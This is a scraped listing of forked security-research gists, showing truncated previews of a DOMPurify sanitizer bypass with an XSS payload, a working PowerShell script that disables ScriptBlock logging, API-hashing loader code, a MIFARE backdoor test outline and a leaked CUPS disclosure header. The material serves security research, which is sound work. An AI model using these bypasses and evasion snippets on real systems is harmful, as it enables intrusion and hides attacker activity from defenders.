This is a work in progress by someone who is learning about Binary Ninja.
References
- https://api.binary.ninja/binaryninja.binaryview-module.html
- https://gist.github.com/psifertex/6fbc7532f536775194edd26290892ef7
Get database name
gavz
/ bn-cheat.md
Created
October 1, 2024 21:29
— forked from alexander-hanel/bn-cheat.md
Cheat Sheet for Binary Ninja
gavz
/ cups-browsed.md
Created
September 27, 2024 10:13
— forked from stong/cups-browsed.md
CUPS disclosure leaked online. Not my report. The original author is @evilsocket
Original report
- Affected Vendor: OpenPrinting
- Affected Product: Several components of the CUPS printing system: cups-browsed, libppd, libcupsfilters and cups-filters.
- Affected Version: All versions <= 2.0.1 (latest release) and master.
- Significant ICS/OT impact? no
- Reporter: Simone Margaritelli [[email protected]]
- Vendor contacted? yes The vendor has been notified trough Github Advisories and all bugs have been confirmed:
gavz
/ gist:e7bd406e17b6541f293b2d64979730c0
Created
August 17, 2024 22:36
— forked from dmaynor/gist:f1973ae244b5c2ed83d3b8e19f798f97
Mifare crypto backdoor flipper app
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Creating a Flipper Zero app to test for this attack involves writing a script that can interact with the RFID module on the Flipper Zero to perform the necessary steps. The Flipper Zero uses a scripting language called **.fap** (Flipper App) format, typically written in C or a high-level scripting language, but it also supports custom Python-like scripting with `flipperzero-tui`. | |
| Here's a basic outline for creating an app that can check for the presence of the backdoor key on a MIFARE Classic card. Note that this is a simplified version and assumes some familiarity with Flipper Zero's development environment. | |
| ### **Step 1: Set Up the Development Environment** | |
| 1. **Install Flipper Zero SDK:** | |
| - Follow the official [Flipper Zero documentation](https://github.com/flipperdevices/flipperzero-firmware) to set up the SDK and development environment. | |
| 2. **Clone the Flipper Zero Firmware:** |
gavz
/ app.js
Created
July 17, 2024 19:05
— forked from kevin-mizu/app.js
DOMPurify bypass using ISO-2022-JP
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const createDOMPurify = require("dompurify"); | |
| const { JSDOM } = require("jsdom"); | |
| const http = require("http"); | |
| const server = http.createServer((req, res) => { | |
| const window = new JSDOM("").window; | |
| const DOMPurify = createDOMPurify(window); | |
| const clean = DOMPurify.sanitize(`<a id="\x1b$B"></a>\x1b(B<a id="><img src=x onerror=alert(1)>"></a>`); | |
| res.statusCode = 200; |
gavz
/ arnold.md
Created
July 17, 2024 18:53
— forked from EvanMcBroom/arnold.md
IllBeBack - An Undocumented Function
Microsoft purchased the software Softricity SoftGrid in 2006 and renamed it to Microsoft Application Virtualization, or App-V for short. Windows shipped with several libraries in System32 and SysWOW64 to support App-V.
One App-V library stands out from all the rest because it only has one exported function named IllBeBack...
That's right!
A library signed by Microsoft, with Terminator in the name, that only has a single callable function named IllBeBack.
gavz
/ ScriptBlockLogBypass.ps1
Created
June 17, 2024 21:10
— forked from cobbr/ScriptBlockLogBypass.ps1
ScriptBlock Logging Bypass
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ScriptBlock Logging Bypass | |
| # @cobbr_io | |
| $GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static') | |
| If ($GroupPolicyField) { | |
| $GroupPolicyCache = $GroupPolicyField.GetValue($null) | |
| If ($GroupPolicyCache['ScriptB'+'lockLogging']) { | |
| $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0 | |
| $GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0 | |
| } |
gavz
/ CheckHvpt.c
Created
June 17, 2024 20:54
— forked from tandasat/CheckHvpt.c
C code to check HVPT availability
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <assert.h> | |
| #include <Windows.h> | |
| // Some of them taken (and modified) from https://github.com/winsiderss/systeminformer | |
| typedef struct _SYSTEM_ISOLATED_USER_MODE_INFORMATION | |
| { | |
| BOOLEAN SecureKernelRunning : 1; | |
| BOOLEAN HvciEnabled : 1; |
gavz
/ 0000-thecus-firmware-decrypt.sh
Created
June 12, 2024 22:47
— forked from nstarke/0000-thecus-firmware-decrypt.sh
Thecus Firmware Decrypt Bash Script
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # | |
| # This script takes a Thecus Firmware Image and decrypts it. | |
| # The encryption key is based off of one of the supported | |
| # models, which are listed in the firmware filename. This | |
| # script will try all of the model names in the file name | |
| # and delete any that do not decrypt to a gzip file. | |
| # | |
| # You will need the following c program compiled and passed |
gavz
/ log_and_scripts_api_resolving_with_x64dbg.md
Created
May 30, 2024 23:28
— forked from a1ext/log_and_scripts_api_resolving_with_x64dbg.md
Log and scripts used in the following video [Resolving APIs dynamically with Labeless & x64dbg] https://youtu.be/hMWuWVRkpB0
Previous part Resolving APIs dynamically with Labeless & OllyDbg2
Hi, now we try to do the same things using x64dbg with x64-bit target application...
Let's try to find out the difference we need to make in IDA python script...
As the base, I use the previous script (see video how to do the same in OllyDbg 2)
gavz
/ get_proc_address.c
Created
May 28, 2024 20:18
— forked from mr-r3bot/get_proc_address.c
Customized GetProcAddress and GetModuleHandle and handle redirected function with API hashing
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| UINT32 HashStringJenkinsOneAtATime32BitA(_In_ PCHAR String) | |
| { | |
| SIZE_T Index = 0; | |
| UINT32 Hash = 0; | |
| SIZE_T Length = lstrlenA(String); | |
| while (Index != Length) | |
| { | |
| Hash += String[Index++]; | |
| Hash += Hash << INITIAL_SEED; |